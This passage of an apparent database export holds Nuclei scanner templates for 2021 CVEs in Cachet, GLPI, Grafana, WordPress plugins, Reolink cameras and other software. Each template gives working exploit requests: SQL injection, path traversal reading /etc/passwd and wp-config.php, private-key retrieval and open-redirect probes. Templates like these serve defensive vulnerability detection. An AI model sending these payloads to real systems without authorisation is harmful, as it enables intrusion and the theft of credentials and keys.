The original repository of Cachet is not active, the stable version 2.3.18 and it's developing 2.4 branch is affected.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade Cachet to a version higher than 2.3.18 or apply the necessary patches provided by the vendor.\n reference:\n - https://www.leavesongs.com/PENETRATION/cachet-from-laravel-sqli-to-bug-bounty.html\n - https://github.com/fiveai/Cachet/commit/27bca8280419966ba80c6fa283d985ddffa84bb6\n - https://github.com/W0rty/CVE-2021-39165/blob/main/exploit.py\n - https://nvd.nist.gov/vuln/detail/CVE-2021-39165\n - https://github.com/fiveai/Cachet/security/advisories/GHSA-79mg-4w23-4fqc\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2021-39165\n cwe-id: CWE-287\n epss-score: 0.04786\n epss-percentile: 0.92528\n cpe: cpe:2.3:a:chachethq:cachet:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: chachethq\n product: cachet\n shodan-query: http.favicon.hash:-1606065523\n tags: cve,cve2021,cachet,sqli,chachethq\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/v1/components?name=1&1%5B0%5D=&1%5B1%5D=a&1%5B2%5D=&1%5B3%5D=or+'a'='a')%20and%20(select%20sleep(6))--\"\n\n redirects: true\n max-redirects: 2\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(content_type, \"application/json\")'\n - 'contains(body, \"pagination\") && contains(body, \"data\")'\n condition: and\n# digest: 4a0a0047304502204b3206034be2f774b8b91870d6386c1beadd44650a52a79e394ef377b8fd8a7e022100be385f84a4f30de70a9f03f2813758d984dbe67e2d2ddbdf8ffb06f772ea2772:922c64590222798bb761d5b6d8e72950", "hash": "f5b53e8007345143885b6b61971488b7", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30839c" }, "name": 
"CVE-2021-39211.yaml", "content": "id: CVE-2021-39211\n\ninfo:\n name: GLPI 9.2/<9.5.6 - Information Disclosure\n author: dogasantos,noraj\n severity: medium\n description: GLPI 9.2 and prior to 9.5.6 is susceptible to information disclosure via the telemetry endpoint, which discloses GLPI and server information. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n Information disclosure vulnerability in GLPI versions 9.2 to <9.5.6 allows an attacker to access sensitive information.\n remediation: This issue is fixed in version 9.5.6. As a workaround, remove the file ajax/telemetry.php, which is not needed for usual GLPI functions.\n reference:\n - https://github.com/glpi-project/glpi/security/advisories/GHSA-xx66-v3g5-w825\n - https://github.com/glpi-project/glpi/releases/tag/9.5.6\n - https://nvd.nist.gov/vuln/detail/CVE-2021-39211\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/StarCrossPortal/scalpel\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2021-39211\n cwe-id: CWE-200,NVD-CWE-noinfo\n epss-score: 0.00161\n epss-percentile: 0.51768\n cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: glpi-project\n product: glpi\n tags: cve,cve2021,glpi,exposure,glpi-project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/ajax/telemetry.php\"\n - \"{{BaseURL}}/glpi/ajax/telemetry.php\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - '\"uuid\":'\n - '\"glpi\":'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100fe062755f4b07576ae5328bf856241f5ea8ffcd7471aee2f20d0e81118a750f7022100963f6ecde4366021315b1d07dede1e4330917c47e2ac4b7068b9c2496b1cc675:922c64590222798bb761d5b6d8e72950", "hash": "67e11cb43d78fb9caee7d169844c13cb", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30839d" }, "name": 
"CVE-2021-39226.yaml", "content": "id: CVE-2021-39226\n\ninfo:\n name: Grafana Snapshot - Authentication Bypass\n author: Evan Rubinstein\n severity: high\n description: Grafana instances up to 7.5.11 and 8.1.5 allow remote unauthenticated users to view the snapshot associated with the lowest database key by accessing the literal paths /api/snapshot/:key or /dashboard/snapshot/:key. If the snapshot is in public mode, unauthenticated users can delete snapshots by accessing the endpoint /api/snapshots-delete/:deleteKey. Authenticated users can also delete snapshots by accessing the endpoints /api/snapshots-delete/:deleteKey, or sending a delete request to /api/snapshot/:key, regardless of whether or not the snapshot is set to public mode (disabled by default).\n impact: |\n An attacker can bypass authentication and gain unauthorized access to Grafana Snapshot feature.\n remediation: 'This issue has been resolved in versions 8.1.6 and 7.5.11. If you cannot upgrade you can block access to the literal paths: /api/snapshots/:key, /api/snapshots-delete/:deleteKey, /dashboard/snapshot/:key, and /api/snapshots/:key. 
They have no normal function and can be disabled without side effects.'\n reference:\n - https://github.com/advisories/GHSA-69j6-29vr-p3j9\n - https://nvd.nist.gov/vuln/detail/CVE-2021-39226\n - https://github.com/grafana/grafana/commit/2d456a6375855364d098ede379438bf7f0667269\n - https://grafana.com/docs/grafana/latest/release-notes/release-notes-8-1-6/\n - http://www.openwall.com/lists/oss-security/2021/10/05/4\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\n cvss-score: 7.3\n cve-id: CVE-2021-39226\n cwe-id: CWE-287\n epss-score: 0.97206\n epss-percentile: 0.9981\n cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: grafana\n product: grafana\n shodan-query: title:\"Grafana\"\n tags: cve2021,cve,grafana,kev\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/snapshots/:key\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - '\"isSnapshot\":true'\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022018328f164b60172c333f6c40599f821c588213819031a1e9a2fc07c9e6f3fe74022100dc1c8beb95c9ea2da8dbf9b90d938190782ff387c7a21e0c44387234f04094fc:922c64590222798bb761d5b6d8e72950", "hash": "4b49d78dc52e7463b002f4efbc1bbbaa", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30839e" }, "name": "CVE-2021-39312.yaml", "content": "id: CVE-2021-39312\n\ninfo:\n name: WordPress True Ranker <2.2.4 - Local File Inclusion\n author: DhiyaneshDK\n severity: high\n description: WordPress True Ranker before version 2.2.4 allows sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the ~/admin/vendor/datatables/examples/resources/examples.php file via local file inclusion.\n remediation: Fixed in version 2.2.4\n reference:\n - https://wpscan.com/vulnerability/d48e723c-e3d1-411e-ab8e-629fe1606c79\n - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39312\n - 
https://plugins.trac.wordpress.org/browser/seo-local-rank/tags/2.2.2/admin/vendor/datatables/examples/resources/examples.php\n - https://nvd.nist.gov/vuln/detail/CVE-2021-39312\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-39312\n cwe-id: CWE-22\n epss-score: 0.16864\n epss-percentile: 0.95927\n cpe: cpe:2.3:a:trueranker:true_ranker:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: trueranker\n product: true_ranker\n framework: wordpress\n tags: cve,cve2021,unauth,lfr,wpscan,wp-plugin,lfi,wp,wordpress,trueranker\n\nhttp:\n - raw:\n - |\n POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n src=%2Fscripts%2Fsimple.php%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"DB_NAME\"\n - \"DB_PASSWORD\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022031ccf1b4c1f46397810347618011728678183100da2fbf4e931582f3f08446bd02202f1d6f5de6611bfc1c9f47b014121e13f12ae3cca0a7027b1d8da7f438c96dbf:922c64590222798bb761d5b6d8e72950", "hash": "1266c5e2c87f21db95f0b2aa51b3f8f1", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30839f" }, "name": "CVE-2021-39316.yaml", "content": "id: CVE-2021-39316\n\ninfo:\n name: WordPress DZS Zoomsounds <=6.50 - Local File Inclusion\n author: daffainfo\n severity: high\n description: WordPress Zoomsounds plugin 6.45 and earlier allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the `dzsap_download` action using directory traversal in the `link` parameter.\n impact: |\n Local File Inclusion vulnerability in WordPress DZS Zoomsounds plugin 
allows an attacker to include arbitrary files from the server, potentially leading to remote code execution or sensitive information disclosure.\n remediation: |\n Update to the latest version of WordPress DZS Zoomsounds plugin (>=6.51) to fix the Local File Inclusion vulnerability.\n reference:\n - https://wpscan.com/vulnerability/d2d60cf7-e4d3-42b6-8dfe-7809f87547bd\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39316\n - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39316\n - http://packetstormsecurity.com/files/165146/WordPress-DZS-Zoomsounds-6.45-Arbitrary-File-Read.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-39316\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-39316\n cwe-id: CWE-22\n epss-score: 0.38985\n epss-percentile: 0.96896\n cpe: cpe:2.3:a:digitalzoomstudio:zoomsounds:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: digitalzoomstudio\n product: zoomsounds\n framework: wordpress\n tags: cve2021,cve,wordpress,wp-plugin,zoomsounds,wpscan,packetstorm,wp,lfi,digitalzoomstudio\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100ecde707e560c69d1ad2644895aa0a7df00b9784807eff673f6e8d4baddf59e71022000ef2d9c907007436551ec1a60f0f69c06d4fec7eff6394f6bb9c12a00b609c0:922c64590222798bb761d5b6d8e72950", "hash": "c5c7730243252a51ffb4146b2de6cc87", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083a0" }, "name": "CVE-2021-39320.yaml", "content": "id: CVE-2021-39320\n\ninfo:\n name: WordPress Under Construction <1.19 - Cross-Site Scripting\n author: dhiyaneshDK\n severity: medium\n description: |\n WordPress Under Construction plugin before 1.19 contains a cross-site scripting vulnerability. 
The plugin echoes out the raw value of `$GLOBALS['PHP_SELF']` in the ucOptions.php file on certain configurations, including Apache+modPHP.\n impact: |\n The vulnerability allows an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or defacement.\n remediation: |\n Update to the latest version of the WordPress Under Construction plugin (1.19 or higher) to fix the XSS vulnerability.\n reference:\n - https://wpscan.com/vulnerability/49ae1df0-d6d2-4cbb-9a9d-bf3599429875\n - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39320\n - https://nvd.nist.gov/vuln/detail/CVE-2021-39320\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-39320\n cwe-id: CWE-79\n epss-score: 0.0021\n epss-percentile: 0.58322\n cpe: cpe:2.3:a:underconstruction_project:underconstruction:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: underconstruction_project\n product: underconstruction\n framework: wordpress\n tags: cve2021,cve,wp-plugin,wpscan,wordpress,wp,xss,authenticated,underconstruction_project\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php/\">/?page=under-construction HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'action=\"/wp-admin/admin.php/\">'\n - 'under-construction'\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a0048304602210093c2ed5b393a57e102799fbb901df39eee9afaf5c1113fb777dd86d1218e7434022100a0402cece1c5f7f2527b421dfde31d2a5ac624e7223448265e76ab4c24d85271:922c64590222798bb761d5b6d8e72950", "hash": 
"83af387ce864a85546ebd39bd7fd4f69", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083a1" }, "name": "CVE-2021-39322.yaml", "content": "id: CVE-2021-39322\n\ninfo:\n name: WordPress Easy Social Icons Plugin < 3.0.9 - Cross-Site Scripting\n author: dhiyaneshDK\n severity: medium\n description: The Easy Social Icons plugin <= 3.0.8 for WordPress echoes out the raw value of `$_SERVER['PHP_SELF']` in its main file. On certain configurations including Apache+modPHP this makes it possible to use it to perform a reflected cross-site scripting attack by injecting malicious code in the request path.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Update to the latest version of the WordPress Easy Social Icons Plugin (3.0.9) or apply the vendor-provided patch to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/5e0bf0b6-9809-426b-b1d4-1fb653083b58\n - https://nvd.nist.gov/vuln/detail/CVE-2021-39322\n - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39322\n - https://wpvulndb.com/vulnerabilities/5e0bf0b6-9809-426b-b1d4-1fb653083b58\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-39322\n cwe-id: CWE-79\n epss-score: 0.00234\n epss-percentile: 0.60718\n cpe: cpe:2.3:a:cybernetikz:easy_social_icons:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: cybernetikz\n product: easy_social_icons\n framework: wordpress\n tags: cve,cve2021,wordpress,wp-plugin,authenticated,wpscan,cybernetikz\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n 
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/admin.php//?page=cnss_social_icon_page HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100e9ee15a8abada7958e711aded015c8de9683c68642039c6bafcd88ef1ddceddf022100842ffd37deba2b63b5a7b9547f566896c8a2aa1054e7cc68f4d01ba1058be6e7:922c64590222798bb761d5b6d8e72950", "hash": "94076fc325f9ae621349ccf23123e58d", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083a2" }, "name": "CVE-2021-39327.yaml", "content": "id: CVE-2021-39327\n\ninfo:\n name: WordPress BulletProof Security 5.1 Information Disclosure\n author: geeknik\n severity: medium\n description: The BulletProof Security WordPress plugin is vulnerable to sensitive information disclosure due to a file path disclosure in the publicly accessible ~/db_backup_log.txt file which grants attackers the full path of the site, in addition to the path of database backup files. 
This affects versions up to, and including, 5.1.\n impact: |\n An attacker can gain sensitive information from the target system.\n remediation: |\n Update to the latest version of WordPress BulletProof Security.\n reference:\n - https://packetstormsecurity.com/files/164420/wpbulletproofsecurity51-disclose.txt\n - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39327\n - https://nvd.nist.gov/vuln/detail/CVE-2021-39327\n - http://packetstormsecurity.com/files/164420/WordPress-BulletProof-Security-5.1-Information-Disclosure.html\n - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2591118%40bulletproof-security&new=2591118%40bulletproof-security&sfp_email=&sfph_mail=\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2021-39327\n cwe-id: CWE-459,CWE-200\n epss-score: 0.16259\n epss-percentile: 0.95861\n cpe: cpe:2.3:a:ait-pro:bulletproof_security:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: ait-pro\n product: bulletproof_security\n framework: wordpress\n tags: cve2021,cve,exposure,packetstorm,wordpress,ait-pro\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/bps-backup/logs/db_backup_log.txt'\n - '{{BaseURL}}/wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'BPS DB BACKUP LOG'\n - '=================='\n condition: and\n\n - type: regex\n negative: true\n part: body\n regex:\n - '^BPS\\sDB\\sBACKUP\\sLOG\\r\\n==================\\r\\n==================\\r\\n\\r\\n$'\n\n - type: word\n part: header\n words:\n - 'text/plain'\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220233e3ffbcf46436ba3a74ab76895ea774a623af8e1f44e28bb5fccbec915615e022007de70ce0060d07208fef78311d18a2f5acf3f43240aa92c7c751447062e05c6:922c64590222798bb761d5b6d8e72950", "hash": "4bfa9d669ea8e3361a722ba48eef7c10", "level": 4, "time": "2024-05-17 
23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083a3" }, "name": "CVE-2021-39350.yaml", "content": "id: CVE-2021-39350\n\ninfo:\n name: FV Flowplayer Video Player WordPress plugin - Authenticated Cross-Site Scripting\n author: gy741\n severity: medium\n description: The FV Flowplayer Video Player WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the player_id parameter found in the ~/view/stats.php file which allows attackers to inject arbitrary web scripts in versions 7.5.0.727 - 7.5.2.727.\n impact: |\n Successful exploitation of this vulnerability could allow an authenticated attacker to execute arbitrary JavaScript code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of the FV Flowplayer Video Player WordPress plugin to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/e9adc166-be7f-4066-a2c1-7926c6304fc9\n - https://nvd.nist.gov/vuln/detail/CVE-2021-39350\n - https://plugins.trac.wordpress.org/changeset/2580834/fv-wordpress-flowplayer/trunk/view/stats.php\n - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39350\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-39350\n cwe-id: CWE-79\n epss-score: 0.00104\n epss-percentile: 0.42206\n cpe: cpe:2.3:a:foliovision:fv_flowplayer_video_player:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: foliovision\n product: fv_flowplayer_video_player\n framework: wordpress\n tags: cve2021,cve,wpscan,wordpress,xss,wp,wp-plugin,authenticated,foliovision\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET 
/wp-admin/admin.php?page=fv_player_stats&player_id=1 HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n - \"

    FV Player Stats

    \"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100e9544ea2a99ec897b7871a37a22dbe9bccc8b1ec287bd257eefcd143ba43c9b0022100cdfc5ef7b6494c579c2c558f7ea57a2811e5485f5f62b6070ae617a8b1b94dbd:922c64590222798bb761d5b6d8e72950", "hash": "d3a149c5d167b9c8ff870a48c8739c09", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083a4" }, "name": "CVE-2021-39433.yaml", "content": "id: CVE-2021-39433\n\ninfo:\n name: BIQS IT Biqs-drive v1.83 Local File Inclusion\n author: Veshraj\n severity: high\n description: A local file inclusion vulnerability exists in version BIQS IT Biqs-drive v1.83 and below when sending a specific payload as the file parameter to download/index.php. This allows the attacker to read arbitrary files from the server with the permissions of the configured web-user.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.\n remediation: |\n Upgrade to the latest version of BIQS IT Biqs-drive (v1.84 or higher) which includes a fix for the Local File Inclusion vulnerability.\n reference:\n - https://github.com/PinkDraconian/CVE-2021-39433/blob/main/README.md\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39433\n - https://biqs-drive.be/\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-39433\n epss-score: 0.00637\n epss-percentile: 0.78687\n cpe: cpe:2.3:a:biqs:biqsdrive:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: biqs\n product: biqsdrive\n tags: cve2021,cve,lfi,biqsdrive,biqs\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/download/index.php?file=../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n 
- type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022045ba9ff8302706637947b44449b56a71b13f3b6d7038baa5c14980a6a1b951ed022100cb6dd26851e8c38528eb8ab2c68b2e3e7378d728c04da0e44b42ab87752924ab:922c64590222798bb761d5b6d8e72950", "hash": "9180cbc25a18f9b3e9330c66f365e8bc", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083a5" }, "name": "CVE-2021-39501.yaml", "content": "id: CVE-2021-39501\n\ninfo:\n name: EyouCMS 1.5.4 Open Redirect\n author: 0x_Akoko\n severity: medium\n description: EyouCMS 1.5.4 contains an open redirect vulnerability. An attacker can redirect a user to a malicious URL via the Logout function.\n impact: |\n Successful exploitation of this vulnerability could lead to phishing attacks or credential theft.\n remediation: |\n Apply the latest security patch or upgrade to a newer version of EyouCMS to mitigate the vulnerability.\n reference:\n - https://github.com/eyoucms/eyoucms/issues/17\n - https://github.com/KietNA-HPT/CVE\n - https://nvd.nist.gov/vuln/detail/CVE-2021-39501\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-39501\n cwe-id: CWE-601\n epss-score: 0.00093\n epss-percentile: 0.38461\n cpe: cpe:2.3:a:eyoucms:eyoucms:1.5.4:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: eyoucms\n product: eyoucms\n tags: cve2021,cve,redirect,eyoucms,cms\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/index.php?m=user&c=Users&a=logout&referurl=https://interact.sh'\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$'\n# digest: 
4b0a00483046022100d016209aa95f121aad60021186d6a2c56623b790d5930cdffd96e00fdb5d2cbe022100e6536c22659a8f7fa88f0fa35686a7ad134c968f613c7471a7c3f6413618ee25:922c64590222798bb761d5b6d8e72950", "hash": "3b5dfff6ce86ffb5c6ce28d217b319a4", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083a6" }, "name": "CVE-2021-40149.yaml", "content": "id: CVE-2021-40149\n\ninfo:\n name: Reolink E1 Zoom Camera <=3.0.0.716 - Private Key Disclosure\n author: For3stCo1d\n severity: medium\n description: |\n Reolink E1 Zoom Camera versions 3.0.0.716 and below suffer from a private key (RSA) disclosure vulnerability.\n impact: |\n An attacker can obtain the private key, potentially leading to unauthorized access and compromise of the camera.\n remediation: |\n Upgrade the Reolink E1 Zoom Camera to a version higher than 3.0.0.716 to mitigate the vulnerability.\n reference:\n - https://dl.packetstormsecurity.net/2206-exploits/reolinke1key-disclose.txt\n - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-40149.txt\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40149\n - http://packetstormsecurity.com/files/167407/Reolink-E1-Zoom-Camera-3.0.0.716-Private-Key-Disclosure.html\n - https://github.com/MrTuxracer/advisories\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 5.9\n cve-id: CVE-2021-40149\n cwe-id: CWE-552\n epss-score: 0.00942\n epss-percentile: 0.82739\n cpe: cpe:2.3:o:reolink:e1_zoom_firmware:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: reolink\n product: e1_zoom_firmware\n shodan-query: http.title:\"Reolink\"\n tags: cve2021,cve,exposure,unauth,packetstorm,reolink,camera,iot\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/self.key\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - '(?m)^-----BEGIN PRIVATE KEY-----'\n\n - type: word\n part: header\n words:\n - \"application/json\"\n - \"application/html\"\n 
condition: and\n negative: true\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022073d439d60074e5d1c5d1337480dffdffea8f90c2d58d768b7d08a2c4498f585a02201a7e02758d8c5b5caf499e37224e8921c170b88c2dcc0be46064b4d10546f7d8:922c64590222798bb761d5b6d8e72950", "hash": "a136b5cd8da9ec8e84fa92e7825eb695", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083a7" }, "name": "CVE-2021-40150.yaml", "content": "id: CVE-2021-40150\n\ninfo:\n name: Reolink E1 Zoom Camera <=3.0.0.716 - Information Disclosure\n author: For3stCo1d\n severity: high\n description: |\n Reolink E1 Zoom camera through 3.0.0.716 is susceptible to information disclosure. The web server discloses its configuration via the /conf/ directory that is mapped to a publicly accessible path. An attacker with network-level access to the camera can download the entire NGINX/FastCGI configurations by querying the /conf/nginx.conf or /conf/fastcgi.conf URI.\n impact: |\n An attacker can exploit this vulnerability to gain access to sensitive information, potentially compromising user privacy and security.\n remediation: |\n Upgrade the Reolink E1 Zoom Camera to a version higher than 3.0.0.716 to mitigate the information disclosure vulnerability (CVE-2021-40150).\n reference:\n - https://dl.packetstormsecurity.net/2206-exploits/reolinke1config-disclose.txt\n - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-40150.txt\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40150\n - https://nvd.nist.gov/vuln/detail/CVE-2021-40150\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-40150\n cwe-id: CWE-552\n epss-score: 0.01099\n epss-percentile: 0.82891\n cpe: cpe:2.3:o:reolink:e1_zoom_firmware:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: reolink\n product: e1_zoom_firmware\n shodan-query: http.title:\"Reolink\"\n tags: 
cve2021,cve,reolink,camera,exposure,iot\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/conf/nginx.conf\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"server\"\n - \"listen\"\n - \"fastcgi\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502202f6a6f1686de8b8b85a4c8c0e8a49bd69f1628bbea7bfd64bdfac2257741b25d022100f6dc5b8e874a47e6c22fa0f1890e646ce7ad62634e7547f215f4c2099198cd43:922c64590222798bb761d5b6d8e72950", "hash": "80f8e301581c02709827572abcf22a10", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083a8" }, "name": "CVE-2021-40323.yaml", "content": "id: CVE-2021-40323\n\ninfo:\n name: Cobbler <3.3.0 - Remote Code Execution\n author: c-sh0\n severity: critical\n description: Cobbler before 3.3.0 allows log poisoning and resultant remote code execution via an XMLRPC method.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially resulting in complete compromise of the affected system.\n remediation: |\n Upgrade Cobbler to version 3.3.0 or later, which includes a fix for this vulnerability.\n reference:\n - 